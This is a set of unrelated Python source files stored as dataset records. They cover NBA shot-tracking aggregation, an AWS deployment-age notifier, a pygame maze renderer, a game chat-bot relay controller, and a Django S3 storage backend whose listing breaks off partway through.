team_id_opponent_team_id_map = kwargs.get(\"team_id_opponent_team_id_map\")\n player_id_team_id_map = kwargs.get(\"player_id_team_id_map\")\n get_player_id_team_id_map = player_id_team_id_map is None\n get_team_id_maps = (\n team_id_game_id_map is None or team_id_opponent_team_id_map is None\n )\n game_logs = []\n for dt in rrule(DAILY, dtstart=start_date, until=end_date):\n date = dt.strftime(\"%m/%d/%Y\")\n if get_team_id_maps:\n (\n team_id_game_id_map,\n team_id_opponent_team_id_map,\n ) = utils.get_team_id_maps_for_date(date)\n if len(team_id_game_id_map.values()) != 0:\n if get_player_id_team_id_map:\n player_id_team_id_map = utils.get_player_team_map_for_date(date)\n date_game_id = list(team_id_game_id_map.values())[0]\n\n season = utils.get_season_from_game_id(date_game_id)\n season_type = utils.get_season_type_from_game_id(date_game_id)\n\n tracking_shots_data = get_tracking_shot_stats(\n entity_type,\n [season],\n [season_type],\n date_from=date,\n date_to=date,\n **kwargs,\n )\n tracking_shots_game_logs = sum_tracking_shot_totals(\n entity_type, tracking_shots_data\n )\n if entity_type == \"player\":\n # need to add team id for player because results only have PLAYER_LAST_TEAM_ID,\n # which may not be the team for which they played the game\n for game_log in tracking_shots_game_logs:\n game_log[\"TEAM_ID\"] = player_id_team_id_map[game_log[\"PLAYER_ID\"]]\n for game_log in tracking_shots_game_logs:\n game_log[\"GAME_ID\"] = team_id_game_id_map[game_log[\"TEAM_ID\"]]\n game_log[\"OPPONENT_TEAM_ID\"] = team_id_opponent_team_id_map[\n game_log[\"TEAM_ID\"]\n ]\n game_logs += tracking_shots_game_logs\n return game_logs\n\n\ndef sum_tracking_shot_totals(entity_type, *args):\n r\"\"\"\n Sums totals for given dicts and grouped by entity type\n\n :param str entity_type: Options are player, team, opponent or league\n :param dict \\*args: Variable length argument list of dicts to be summed up\n :return: list of dicts with totals for each entity\n :rtype: list[dict]\n \"\"\"\n if entity_type == \"player\":\n entity_key = \"PLAYER_ID\"\n elif entity_type == \"team\" or entity_type == \"opponent\":\n entity_key = \"TEAM_ID\"\n elif entity_type == \"league\":\n totals_dict = {\n \"FGM\": 0,\n \"FGA\": 0,\n \"FG2M\": 0,\n \"FG2A\": 0,\n \"FG3M\": 
0,\n \"FG3A\": 0,\n \"OVERALL_FGA\": 0,\n \"OVERALL_FG2A\": 0,\n \"OVERALL_FG3A\": 0,\n }\n for items in args:\n for item in items:\n totals_dict = add_to_tracking_shot_totals(totals_dict, item)\n return totals_dict\n else:\n return None\n totals_dict = {}\n for items in args:\n for item in items:\n entity_id = item[entity_key]\n if entity_id not in totals_dict.keys():\n if entity_type == \"player\":\n totals_dict[entity_id] = {\n \"PLAYER_ID\": item[\"PLAYER_ID\"],\n \"PLAYER_NAME\": item[\"PLAYER_NAME\"],\n \"PLAYER_LAST_TEAM_ID\": item[\"PLAYER_LAST_TEAM_ID\"],\n \"PLAYER_LAST_TEAM_ABBREVIATION\": item[\n \"PLAYER_LAST_TEAM_ABBREVIATION\"\n ],\n \"FGM\": 0,\n \"FGA\": 0,\n \"FG2M\": 0,\n \"FG2A\": 0,\n \"FG3M\": 0,\n \"FG3A\": 0,\n \"OVERALL_FGA\": 0,\n \"OVERALL_FG2A\": 0,\n \"OVERALL_FG3A\": 0,\n }\n elif entity_type == \"team\" or entity_type == \"opponent\":\n totals_dict[entity_id] = {\n \"TEAM_ID\": item[\"TEAM_ID\"],\n \"TEAM_NAME\": item[\"TEAM_NAME\"],\n \"TEAM_ABBREVIATION\": item[\"TEAM_ABBREVIATION\"],\n \"FGM\": 0,\n \"FGA\": 0,\n \"FG2M\": 0,\n \"FG2A\": 0,\n \"FG3M\": 0,\n \"FG3A\": 0,\n \"OVERALL_FGA\": 0,\n \"OVERALL_FG2A\": 0,\n \"OVERALL_FG3A\": 0,\n }\n totals_dict[entity_id] = add_to_tracking_shot_totals(\n totals_dict[entity_id], item\n )\n\n return list(totals_dict.values())\n\n\ndef add_to_tracking_shot_totals(totals, item):\n \"\"\"\n Adds shot totals from item to totals and updates percentages\n\n :param dict totals: Totals to be added to\n :param dict item: Item to be added to totals dict\n :return: totals dict\n :rtype: dict\n \"\"\"\n totals[\"FGM\"] += item[\"FGM\"]\n totals[\"FGA\"] += item[\"FGA\"]\n totals[\"FG2M\"] += item[\"FG2M\"]\n totals[\"FG2A\"] += item[\"FG2A\"]\n totals[\"FG3M\"] += item[\"FG3M\"]\n totals[\"FG3A\"] += item[\"FG3A\"]\n totals[\"OVERALL_FGA\"] += item.get(\"OVERALL_FGA\", 0)\n totals[\"OVERALL_FG2A\"] += item.get(\"OVERALL_FG2A\", 0)\n totals[\"OVERALL_FG3A\"] += item.get(\"OVERALL_FG3A\", 0)\n fg2a = totals[\"FG2A\"]\n fg2m = totals[\"FG2M\"]\n fg3a = totals[\"FG3A\"]\n fg3m = totals[\"FG3M\"]\n totals[\"FG2_PCT\"] = fg2m / fg2a if fg2a != 0 else 0\n totals[\"FG3_PCT\"] = fg3m / fg3a if fg3a != 0 else 0\n totals[\"EFG_PCT\"] = (1.5 * fg3m + fg2m) / (fg3a + fg2a) if (fg3a + fg2a) != 0 else 0\n totals[\"FGA_FREQUENCY\"] = (\n totals[\"FGA\"] / totals[\"OVERALL_FGA\"] if totals[\"OVERALL_FGA\"] != 0 else 0\n )\n totals[\"FG2A_FREQUENCY\"] = (\n totals[\"FG2A\"] / totals[\"OVERALL_FGA\"] if totals[\"OVERALL_FGA\"] != 0 else 0\n )\n totals[\"FG3A_FREQUENCY\"] = (\n totals[\"FG3A\"] / totals[\"OVERALL_FGA\"] if totals[\"OVERALL_FGA\"] != 0 else 0\n )\n totals[\"FREQUENCY_OF_FG2A\"] = (\n totals[\"FG2A\"] / totals[\"OVERALL_FG2A\"] if totals[\"OVERALL_FG2A\"] != 0 else 0\n )\n totals[\"FREQUENCY_OF_FG3A\"] = (\n totals[\"FG3A\"] / totals[\"OVERALL_FG3A\"] if totals[\"OVERALL_FG3A\"] != 0 else 0\n )\n\n return totals\n","sub_path":"nba_stats_tracking/tracking_shots.py","file_name":"tracking_shots.py","file_ext":"py","file_size_in_byte":18697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"632060812","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\nChecks the DynamoDB deployments table for deployments with a createdAt date\nolder than the given AGE_BOUNDARY_MINS.\n\nPublishes a message to a given SNS topic if any out of date deployments are\nfound.\n\nThis lambda is intended to be run on a repeated schedule of some period less\nthan 
AGE_BOUNDARY_MINS.\n\"\"\"\n\nfrom datetime import datetime, timedelta\nimport os\n\nimport boto3\n\nfrom wellcome_lambda_utils.deployment_utils import get_deployments_from_dynamo\nfrom wellcome_aws_utils.lambda_utils import log_on_error\nfrom wellcome_aws_utils.sns_utils import publish_sns_message\n\n\ndef _old_deployment(age_boundary_mins, deployment):\n age_boundary = (\n datetime.now() - timedelta(minutes=age_boundary_mins)\n )\n\n return (\n (deployment.created_at < age_boundary) and deployment.color == \"green\"\n )\n\n\ndef filter_old_deployments(deployments, age_boundary_mins):\n return (\n [d for d in deployments if _old_deployment(age_boundary_mins, d)]\n )\n\n\n@log_on_error\ndef main(event, _):\n table_name = os.environ[\"TABLE_NAME\"]\n topic_arn = os.environ[\"TOPIC_ARN\"]\n age_boundary_mins = int(os.environ[\"AGE_BOUNDARY_MINS\"])\n\n sns_client = boto3.client('sns')\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table(table_name)\n\n deployments = get_deployments_from_dynamo(table)\n old_deployments = filter_old_deployments(deployments, age_boundary_mins)\n\n # Only publish when out-of-date deployments were actually found\n if old_deployments:\n publish_sns_message(\n sns_client=sns_client,\n topic_arn=topic_arn,\n message=old_deployments\n )\n\n print(f'old_deployments = {old_deployments!r}')\n","sub_path":"monitoring/deployment_tracking/notify_old_deploys/src/notify_old_deploys.py","file_name":"notify_old_deploys.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"249011186","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/11/5 8:37 AM\n# @Author : ytq\n# @FileName: url_reader.py\n# @Software: PyCharm\nimport os\n\nfrom src.wework_request.utils.read_yaml import ReadYaml\n\n\nclass UrlReader:\n\n def __init__(self):\n self.path = \"../config\"\n self.file = \"urls\"\n self.ym_obj = ReadYaml(path=self.path,file=self.file)\n\n def get_url(self,obj_name):\n url_obj = self.ym_obj.get_yaml_data(obj_name)\n return url_obj[\"url\"]\n\n def get_api(self,obj_name,url_name):\n url_obj = self.ym_obj.get_yaml_data(obj_name)\n return url_obj[url_name]\n\n def get_api_by_parent(self,url_name,per_obj):\n return per_obj[url_name]\n\nif __name__ == '__main__':\n ur = UrlReader()\n print(ur.get_url(\"wework\"))\n print(ur.get_api(\"wework\",\"token\"))\n dpt = ur.get_api(\"wework\",\"department\")\n print(ur.get_api_by_parent(\"dpt_list\",dpt))","sub_path":"src/wework_request/data/url_reader.py","file_name":"url_reader.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"156239344","text":"# 20190320\n# Let's control the turtle with commands entered by the user.\n# That is, when the user types \"left\", the turtle turns left by 60 degrees and moves forward 50 steps,\n# and when the user types \"right\", it turns right by 60 degrees and moves forward 50 steps.\n\nimport turtle\n\nt = turtle.Pen()\n\nwhile True:\n input_string = input(\"Please choose the direction[left / right]: \")\n if input_string == \"left\":\n t.left(60)\n t.forward(50)\n\n elif input_string == \"right\":\n t.right(60)\n t.forward(50)\n\n elif input_string == \"stop\":\n print(\"End\")\n break\n else:\n print(\"Retype\\n\")\n","sub_path":"20190320 Practice/lab03.py","file_name":"lab03.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440796213","text":"#!/usr/bin/python3\n# coding: utf-8\n\nimport pygame\nfrom pygame.locals import *\n\nfrom character import Character\nfrom 
items import Items\nfrom level import Level\nfrom inputs import inputs\n\n#from maze import screen_loop\n\n\nclass GraphicLevel(Level):\n \"\"\" Class redefines the display() method based on the inheritance of the Level class \"\"\"\n\n def __init__(self, file):\n super().__init__(file)\n #self.items = {}\n\n def display(self):\n \"\"\" Method specifically redefined to display the maze graphically \"\"\"\n\n \"\"\" Initializing and loading pictures \"\"\"\n fenetre = pygame.display.get_surface()\n picture_background = pygame.image.load(\n \"images/background.jpg\").convert()\n fenetre.blit(picture_background, (0, 0))\n \"\"\" Loading sprites \"\"\"\n pic_mac_gyver = pygame.image.load(\n \"images/mac_gyver.png\").convert_alpha()\n pic_gardian = pygame.image.load(\"images/gardian.png\").convert_alpha()\n pic_wall = pygame.image.load(\"images/wall.png\").convert()\n pic_ether = pygame.image.load(\"images/ether.png\").convert()\n pic_tube = pygame.image.load(\"images/tube.png\").convert()\n pic_niddle = pygame.image.load(\"images/niddle.png\").convert_alpha()\n pic_syringe = pygame.image.load(\"images/syringe.png\").convert()\n pic_free = pygame.image.load(\"images/free.png\").convert_alpha()\n pic_defeat = pygame.image.load(\"images/defeat.png\").convert_alpha()\n mask_wall = pygame.image.load(\"images/mask_wall.jpg\").convert()\n # Makes transparent the color white (RGB value: 255,255,255) of the picture\n pic_tube.set_colorkey((255, 255, 255))\n pic_syringe.set_colorkey((255, 255, 255))\n pic_ether.set_colorkey((1, 1, 1))\n\n\n for index_line in range(15):\n # Inversion of x and y in graphical representation\n y = index_line * 40\n for index_col in range(15):\n x = index_col * 40\n if (index_line, index_col) in self.passages:\n if (index_line, index_col) \\\n == self.mac_gyver.get_position():\n fenetre.blit(pic_mac_gyver, (x, y))\n # elif (index_line, index_col) in self.tools.location_tools:\n # fenetre.blit(pic_ether, (x, y))\n #self.items[x, y] = pic_generic_tool\n elif (index_line, index_col) == self.tools.location_ether:\n fenetre.blit(pic_ether, (x, y)) # Display of the ether\n elif (index_line, index_col) == self.tools.location_tube:\n fenetre.blit(pic_tube, (x, y)) # Display of the tube\n elif (index_line, index_col) == self.tools.location_niddle:\n fenetre.blit(pic_niddle, (x, y)) # Display of the niddle\n elif (index_line, index_col) == self.pos_exit:\n fenetre.blit(pic_gardian, (x, y)) # Display of the guardian\n else:\n fenetre.blit(pic_wall, (x, y))\n\n # management of the pouch\n fenetre.blit(mask_wall, (600, 0))\n if len(self.tools.pouch) < 3:\n if \"E\" in list(self.tools.pouch):\n fenetre.blit(pic_ether, (610, 50))\n if \"T\" in list(self.tools.pouch):\n fenetre.blit(pic_tube, (610, 100))\n if \"N\" in list(self.tools.pouch):\n fenetre.blit(pic_niddle, (610, 150))\n elif len(self.tools.pouch) == 3:\n fenetre.blit(mask_wall, (600, 0))\n fenetre.blit(pic_syringe, (600, 80))\n\n\n # if self.mac_gyver.fight == \"win\":\n # fenetre.blit(pic_free, (0, 0)) # you win\n # #pygame.time.Clock().tick(300)\n # while stay:\n # if inputs() == \"end\":\n # stay = False\n # #screen_loop(\"images/free.png\")\n\n # elif self.mac_gyver.fight == \"defeat\":\n # fenetre.blit(pic_defeat, (0, 0)) # you loose\n # #pygame.time.Clock().tick(300)\n # while stay:\n # if inputs() == \"end\":\n # stay = False\n","sub_path":"graphic_level.py","file_name":"graphic_level.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 
+{"seq_id":"466967456","text":"from core.chat_blob import ChatBlob\nfrom core.command_service import CommandService\nfrom core.decorators import instance, event\nfrom core.dict_object import DictObject\nfrom core.logger import Logger\nfrom core.public_channel_service import PublicChannelService\nfrom core.setting_service import SettingService\nfrom core.setting_types import BooleanSettingType\nfrom core.text import Text\nfrom modules.core.org_members.org_member_controller import OrgMemberController\n\n\n@instance()\nclass OrgChannelController:\n MESSAGE_SOURCE = \"org_channel\"\n ORG_CHANNEL_PREFIX = \"[Org]\"\n\n def __init__(self):\n self.logger = Logger(__name__)\n\n def inject(self, registry):\n self.bot = registry.get_instance(\"bot\")\n self.character_service = registry.get_instance(\"character_service\")\n self.message_hub_service = registry.get_instance(\"message_hub_service\")\n self.setting_service: SettingService = registry.get_instance(\"setting_service\")\n self.ban_service = registry.get_instance(\"ban_service\")\n self.log_controller = registry.get_instance(\"log_controller\", is_optional=True)\n self.online_controller = registry.get_instance(\"online_controller\", is_optional=True)\n self.text: Text = registry.get_instance(\"text\")\n\n def pre_start(self):\n self.message_hub_service.register_message_source(self.MESSAGE_SOURCE)\n\n def start(self):\n self.message_hub_service.register_message_destination(\n self.MESSAGE_SOURCE, self.handle_incoming_relay_message,\n [\"private_channel\", \"discord\", \"websocket_relay\", \"tell_relay\", \"broadcast\", \"raffle\", \"cloak_reminder\", \"wave_counter\", \"shutdown_notice\", \"raid\", \"tower_attacks\"],\n [self.MESSAGE_SOURCE])\n\n self.setting_service.register(self.module_name, \"prefix_org_priv\", True, BooleanSettingType(), \"Should the prefix [org] be displayed in relayed messages\")\n\n def handle_incoming_relay_message(self, ctx):\n for _id, conn in self.bot.get_conns(lambda x: x.is_main and x.org_id):\n self.bot.send_org_message(ctx.formatted_message, conn=conn)\n\n @event(event_type=PublicChannelService.ORG_CHANNEL_MESSAGE_EVENT, description=\"Relay messages from the org channel to the relay hub\", is_hidden=True)\n def handle_org_message_event(self, event_type, event_data):\n if self.bot.get_conn_by_char_id(event_data.char_id) or self.ban_service.get_ban(event_data.char_id):\n return\n\n if event_data.extended_message:\n message = event_data.extended_message.get_message()\n else:\n message = event_data.message\n\n if event_data.char_id == 4294967295 or event_data.char_id == 0:\n sender = None\n formatted_message = \"{org} {msg}\".format(org=self.ORG_CHANNEL_PREFIX,\n msg=message)\n else:\n sender = DictObject({\"char_id\": event_data.char_id, \"name\": event_data.name})\n formatted_message = \"{org} {char}: {msg}\".format(org=self.ORG_CHANNEL_PREFIX,\n char=self.text.make_charlink(event_data.name),\n msg=message)\n\n self.bot.send_message_to_other_org_channels(formatted_message, from_conn=event_data.conn)\n self.message_hub_service.send_message(self.MESSAGE_SOURCE, sender, self.ORG_CHANNEL_PREFIX, message)\n\n @event(event_type=OrgMemberController.ORG_MEMBER_LOGON_EVENT, description=\"Notify when org member logs on\")\n def org_member_logon_event(self, event_type, event_data):\n if self.bot.is_ready():\n if self.online_controller:\n char_info = self.online_controller.get_char_info_display(event_data.char_id, event_data.conn)\n else:\n char_info = self.character_service.resolve_char_to_name(event_data.char_id, 
f\"Unknown({event_data.char_id})\")\n\n msg = f\"{char_info} has logged on.\"\n if self.log_controller:\n msg += \" \" + self.log_controller.get_logon(event_data.char_id)\n\n for _id, conn in self.bot.get_conns(lambda x: x.is_main and x.org_id):\n self.bot.send_org_message(msg, conn=conn)\n self.message_hub_service.send_message(self.MESSAGE_SOURCE, None, self.ORG_CHANNEL_PREFIX, msg)\n\n @event(event_type=OrgMemberController.ORG_MEMBER_LOGOFF_EVENT, description=\"Notify when org member logs off\")\n def org_member_logoff_event(self, event_type, event_data):\n if self.bot.is_ready():\n char_name = event_data.name or f\"Unknown({event_data.char_id})\"\n msg = f\"{char_name} has logged off.\"\n if self.log_controller:\n msg += \" \" + self.log_controller.get_logoff(event_data.char_id)\n\n for _id, conn in self.bot.get_conns(lambda x: x.is_main and x.org_id):\n self.bot.send_org_message(msg, conn=conn)\n self.message_hub_service.send_message(self.MESSAGE_SOURCE, None, self.ORG_CHANNEL_PREFIX, msg)\n\n @event(event_type=PublicChannelService.ORG_CHANNEL_COMMAND_EVENT, description=\"Relay commands from the org channel to the relay hub\", is_hidden=True)\n def outgoing_org_message_event(self, event_type, event_data):\n msg = self.ORG_CHANNEL_PREFIX + \" \"\n sender = None\n if event_data.name:\n msg += self.text.make_charlink(event_data.name) + \": \"\n sender = DictObject({\"char_id\": event_data.char_id, \"name\": event_data.name})\n\n if isinstance(event_data.message, ChatBlob):\n pages = self.text.paginate(ChatBlob(event_data.message.title, event_data.message.msg),\n event_data.conn,\n self.setting_service.get(\"org_channel_max_page_length\").get_value())\n if len(pages) < 4:\n for page in pages:\n message = msg + page\n self.bot.send_message_to_other_org_channels(message, from_conn=event_data.conn)\n self.message_hub_service.send_message(self.MESSAGE_SOURCE, sender, self.ORG_CHANNEL_PREFIX, page)\n else:\n message = msg + event_data.message.title\n self.bot.send_message_to_other_org_channels(message, from_conn=event_data.conn)\n self.message_hub_service.send_message(self.MESSAGE_SOURCE, sender, self.ORG_CHANNEL_PREFIX, event_data.message.title)\n else:\n message = msg + event_data.message\n self.bot.send_message_to_other_org_channels(message, from_conn=event_data.conn)\n self.message_hub_service.send_message(self.MESSAGE_SOURCE, sender, self.ORG_CHANNEL_PREFIX, event_data.message)\n","sub_path":"modules/standard/org/org_channel_controller.py","file_name":"org_channel_controller.py","file_ext":"py","file_size_in_byte":6772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333300319","text":"import os\nimport math\nimport mimetypes\n\ntry:\n from io import StringIO, BytesIO\nexcept ImportError:\n from io import StringIO, BytesIO # noqa\n\nfrom django.conf import settings\nfrom django.core.files.base import File\nfrom .storage import Storage, FileSystemStorage\nfrom .tasks import upload_task\n\nfrom django.core.exceptions import ImproperlyConfigured, SuspiciousOperation\nfrom django.utils.encoding import force_text as force_unicode, smart_str\nfrom django.utils.deconstruct import deconstructible\n\nfrom .filechunkio import FileChunkIO\n\ntry:\n from boto.s3.connection import S3Connection, SubdomainCallingFormat,NoHostProvided\n from boto.exception import S3ResponseError\n from boto.s3.key import Key\nexcept ImportError:\n raise ImproperlyConfigured(\"Could not load Boto's S3 bindings.\\n\"\n \"See 
https://github.com/boto/boto\")\n\nACCESS_KEY_NAME = getattr(settings, 'AWS_S3_ACCESS_KEY_ID', getattr(settings, 'AWS_ACCESS_KEY_ID', None))\nSECRET_KEY_NAME = getattr(settings, 'AWS_S3_SECRET_ACCESS_KEY', getattr(settings, 'AWS_SECRET_ACCESS_KEY', None))\nHOST = getattr(settings, 'AWS_HOST', NoHostProvided)\nHEADERS = getattr(settings, 'AWS_HEADERS', {})\nSTORAGE_BUCKET_NAME = getattr(settings, 'AWS_STORAGE_BUCKET_NAME', None)\nAUTO_CREATE_BUCKET = getattr(settings, 'AWS_AUTO_CREATE_BUCKET', False)\nDEFAULT_ACL = getattr(settings, 'AWS_DEFAULT_ACL', 'public-read')\nBUCKET_ACL = getattr(settings, 'AWS_BUCKET_ACL', DEFAULT_ACL)\nQUERYSTRING_AUTH = getattr(settings, 'AWS_QUERYSTRING_AUTH', True)\nQUERYSTRING_EXPIRE = getattr(settings, 'AWS_QUERYSTRING_EXPIRE', 3600)\nREDUCED_REDUNDANCY = getattr(settings, 'AWS_REDUCED_REDUNDANCY', False)\nLOCATION = getattr(settings, 'AWS_LOCATION', '')\nENCRYPTION = getattr(settings, 'AWS_S3_ENCRYPTION', False)\nCUSTOM_DOMAIN = getattr(settings, 'AWS_S3_CUSTOM_DOMAIN', None)\nCALLING_FORMAT = getattr(settings, 'AWS_S3_CALLING_FORMAT',\n SubdomainCallingFormat())\nSECURE_URLS = getattr(settings, 'AWS_S3_SECURE_URLS', True)\nFILE_NAME_CHARSET = getattr(settings, 'AWS_S3_FILE_NAME_CHARSET', 'utf-8')\nFILE_OVERWRITE = getattr(settings, 'AWS_S3_FILE_OVERWRITE', True)\nFILE_BUFFER_SIZE = getattr(settings, 'AWS_S3_FILE_BUFFER_SIZE', 62914560)\nCHUNK_SIZE = getattr(settings, 'AWS_S3_CHUNK_SIZE', 6291456)\nIS_GZIPPED = getattr(settings, 'AWS_IS_GZIPPED', False)\nPRELOAD_METADATA = getattr(settings, 'AWS_PRELOAD_METADATA', False)\nGZIP_CONTENT_TYPES = getattr(settings, 'GZIP_CONTENT_TYPES', (\n 'text/css',\n 'application/javascript',\n 'application/x-javascript',\n))\nURL_PROTOCOL = getattr(settings, 'AWS_S3_URL_PROTOCOL', 'http:')\n\n# Backward-compatibility: given the anteriority of the SECURE_URL setting\n# we fall back to https if specified in order to avoid the construction\n# of unsecure urls.\nif SECURE_URLS:\n URL_PROTOCOL = 'https:'\n\nif IS_GZIPPED:\n from gzip import GzipFile\n\n\ndef safe_join(base, *paths):\n \"\"\"\n A version of django.utils._os.safe_join for S3 paths.\n\n Joins one or more path components to the base path component\n intelligently. Returns a normalized version of the final path.\n\n The final path must be located inside of the base path component\n (otherwise a ValueError is raised).\n\n Paths outside the base path indicate a possible security\n sensitive operation.\n \"\"\"\n from urllib.parse import urljoin\n\n # smart_text(s, encoding='utf-8', strings_only=False, errors='strict') converts\n # its input to a Unicode string\n\n # force_text(s, encoding='utf-8', strings_only=False, errors='strict') is\n # identical to smart_text() in almost all cases. 
The difference is when the\n # first argument is a lazy translation instance.\n # While smart_text() preserves lazy translations, force_text() forces\n # those objects to a Unicode string (causing the translation to occur).\n base_path = force_unicode(base)\n base_path = base_path.rstrip('/')\n paths = [force_unicode(p) for p in paths]\n\n final_path = base_path\n for path in paths:\n final_path = urljoin(final_path.rstrip('/') + \"/\", path.rstrip(\"/\"))\n\n # Ensure final_path starts with base_path and that the next character after\n # the final path is '/' (or nothing, in which case final_path must be\n # equal to base_path).\n base_path_len = len(base_path)\n if (not final_path.startswith(base_path) or\n final_path[base_path_len:base_path_len + 1] not in ('', '/')):\n raise ValueError('the joined path is located outside of the base path'\n ' component')\n\n return final_path.lstrip('/')\n\n\n@deconstructible\nclass S3BotoStorage(Storage):\n \"\"\"\n Amazon Simple Storage Service using Boto\n\n This storage backend supports opening files in read or write\n mode and supports streaming(buffering) data in chunks to S3\n when writing.\n \"\"\"\n connection_class = S3Connection\n connection_response_error = S3ResponseError\n\n def __init__(self, bucket=STORAGE_BUCKET_NAME, access_key=None,\n secret_key=None, bucket_acl=BUCKET_ACL, acl=DEFAULT_ACL,\n headers=HEADERS, gzip=IS_GZIPPED,\n gzip_content_types=GZIP_CONTENT_TYPES,\n querystring_auth=QUERYSTRING_AUTH,\n querystring_expire=QUERYSTRING_EXPIRE,\n reduced_redundancy=REDUCED_REDUNDANCY,\n encryption=ENCRYPTION,\n custom_domain=CUSTOM_DOMAIN,\n secure_urls=SECURE_URLS,\n url_protocol=URL_PROTOCOL,\n location=LOCATION,\n file_buffer_size=FILE_BUFFER_SIZE,\n chunk_size=CHUNK_SIZE,\n file_name_charset=FILE_NAME_CHARSET,\n preload_metadata=PRELOAD_METADATA,\n calling_format=CALLING_FORMAT):\n\n self.bucket_acl = bucket_acl\n self.bucket_name = bucket\n self.acl = acl\n self.headers = headers\n self.preload_metadata = preload_metadata\n self.gzip = gzip\n self.gzip_content_types = gzip_content_types\n self.querystring_auth = querystring_auth\n self.querystring_expire = querystring_expire\n self.reduced_redundancy = reduced_redundancy\n self.encryption = encryption\n self.custom_domain = custom_domain\n self.secure_urls = secure_urls\n self.url_protocol = url_protocol\n self.location = location or ''\n self.location = self.location.lstrip('/')\n self.chunk_size = chunk_size\n self.file_buffer_size = file_buffer_size\n self.file_name_charset = file_name_charset\n self.calling_format = calling_format\n self._entries = {}\n if not access_key and not secret_key:\n access_key, secret_key = self._get_access_keys()\n self.connection = self.connection_class(access_key, secret_key,\n calling_format=self.calling_format,host=HOST)\n\n @property\n def bucket(self):\n \"\"\"\n Get the current bucket. If there is no current bucket object\n create it.\n \"\"\"\n if not hasattr(self, '_bucket'):\n self._bucket = self._get_or_create_bucket(self.bucket_name)\n return self._bucket\n\n @property\n def entries(self):\n \"\"\"\n Get the locally cached files for the bucket.\n \"\"\"\n if self.preload_metadata and not self._entries:\n self._entries = dict((self._decode_name(entry.key), entry)\n for entry in self.bucket.list())\n return self._entries\n\n def _get_access_keys(self):\n \"\"\"\n Gets the access keys to use when accessing S3. 
If none\n are provided to the class in the constructor or in the\n settings then get them from the environment variables.\n \"\"\"\n access_key = ACCESS_KEY_NAME\n secret_key = SECRET_KEY_NAME\n if (access_key or secret_key) and (not access_key or not secret_key):\n # TODO: this seems to be broken\n access_key = os.environ.get(ACCESS_KEY_NAME)\n secret_key = os.environ.get(SECRET_KEY_NAME)\n\n if access_key and secret_key:\n # Both were provided, so use them\n return access_key, secret_key\n\n return None, None\n\n def _get_or_create_bucket(self, name):\n \"\"\"Retrieves a bucket if it exists, otherwise creates it.\"\"\"\n try:\n #If validate=False is passed, no request is made to the service\n # (no charge/communication delay). This is only safe to do if you are\n # sure the bucket exists.\n # If the bucket does not exist, an S3ResponseError will be raised.\n return self.connection.get_bucket(name, validate=AUTO_CREATE_BUCKET)\n\n except self.connection_response_error:\n if AUTO_CREATE_BUCKET:\n bucket = self.connection.create_bucket(name)\n bucket.set_acl(self.bucket_acl)\n return bucket\n\n raise ImproperlyConfigured(\"Bucket specified by \"\n \"AWS_STORAGE_BUCKET_NAME does not exist. \"\n \"Buckets can be automatically created by setting \"\n \"AWS_AUTO_CREATE_BUCKET=True\")\n\n #Anytime we're taking in a name we call\n # _clean_name: normpath and replace\n # _normalize_name: check the path integrity rel 'location'\n def _clean_name(self, name):\n \"\"\"\n Cleans the name so that Windows style paths work\n i.e. normpath escapes back slashes '\\' to '\\\\'\n we then replace with single\n \"\"\"\n # Useful for windows' paths\n return os.path.normpath(name).replace('\\\\', '/')\n\n def _normalize_name(self, name):\n \"\"\"\n Normalizes the name so that paths like /path/to/ignored/../something.txt\n work. We check to make sure that the path pointed to is not outside\n the directory specified by the LOCATION setting.\n Required since the S3 key will, in essence, be the path name\n \"\"\"\n try:\n return safe_join(self.location, name)\n except ValueError:\n raise SuspiciousOperation(\"Attempted access to '{}' denied.\".format(name))\n\n def _encode_name(self, name):\n \"\"\"\n file_name_charset = 'AWS_S3_FILE_NAME_CHARSET', 'utf-8'\n smart_str - returns a str or a lazy string\n \"\"\"\n return smart_str(name, encoding=self.file_name_charset)\n\n def _decode_name(self, name):\n return force_unicode(name, encoding=self.file_name_charset)\n\n def _compress_content(self, content):\n \"\"\"Gzip a given string content.\"\"\"\n # GzipFile writes bytes, so the in-memory buffer must be binary\n zbuf = BytesIO()\n zfile = GzipFile(mode='wb', compresslevel=6, fileobj=zbuf)\n try:\n zfile.write(content.read())\n finally:\n zfile.close()\n content.file = zbuf\n content.seek(0)\n return content\n\n def _open(self, name, mode='rb'):\n \"\"\"\n Called by Storage.open(), this is the actual mechanism the storage class uses\n to open the file. This must return a File object, though in most cases, you’ll\n want to return some subclass (S3BotoStorageFile) here that implements logic\n specific to the backend storage system.\n \"\"\"\n name = self._normalize_name(self._clean_name(name))\n\n f = S3BotoStorageFile(name, mode, self)\n if not f.key:\n raise IOError('File does not exist: %s' % name)\n return f\n\n def _save(self, name, content):\n \"\"\"\n Called by Storage.save(). 
The name will already have gone through\n get_valid_name() and get_available_name(), and the content will be a\n File object itself.\n Should return the actual name of name of the file saved (usually the name\n passed in, but if the storage needs to change the file name return the\n new name instead).\n \"\"\"\n\n #Convert windows-style file names\n cleaned_name = self._clean_name(name)\n\n #1. removes any relative path naming conventions\n #2. calls _safe_join on the name\n name = self._normalize_name(cleaned_name)\n\n # \"shallow copying\" -- copy and create new references\n # \"deep copying\" -- copy by value\n headers = self.headers.copy()\n\n #Default is 'applications/octet-stream'\n content_type = getattr(content, 'content_type', mimetypes.guess_type(name)[0] or Key.DefaultContentType)\n\n # setting the content_type in the key object is not enough.\n self.headers.update({'Content-Type': content_type})\n\n # gzip == IS_GZIPPED (false by default)\n if self.gzip and content_type in self.gzip_content_types:\n content = self._compress_content(content)\n headers.update({'Content-Encoding': 'gzip'})\n\n ## content.name = name of the file including the relative path from MEDIA_ROOT\n content.name = cleaned_name\n encoded_name = self._encode_name(name)\n ### cleaned_name = 